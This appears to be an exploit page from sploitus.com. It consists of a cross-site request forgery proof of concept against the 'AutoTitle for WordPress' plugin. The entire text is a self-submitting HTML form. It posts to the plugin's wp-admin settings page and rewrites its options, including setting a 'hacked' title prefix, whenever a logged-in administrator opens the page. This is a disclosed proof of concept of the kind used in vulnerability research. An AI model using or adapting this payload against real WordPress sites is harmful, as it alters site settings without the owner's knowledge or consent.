Share
## https://sploitus.com/exploit?id=WPEX-ID:54A00416-C7E3-44F3-8DD2-ED9E748055E6
<form action="https://example.com/wp-admin/options-general.php?page=autotitle-for-wordpress.php" method="POST">
<input type="text" name="publish_only" value="Y">
<input type="text" name="limit" value="3">
<input type="text" name="maxlimit" value="6">
<input type="text" name="stoppers" value="! ? . ,">
<input type="text" name="include_stopper" value="Y">
<input type="text" name="exclude_stopper" value=",">
<input type="text" name="prefix" value="hacked">
<input type="text" name="postfix" value="">
<input type="text" name="do" value="Update">
</form>
<script>
document.forms[0].submit();
</script>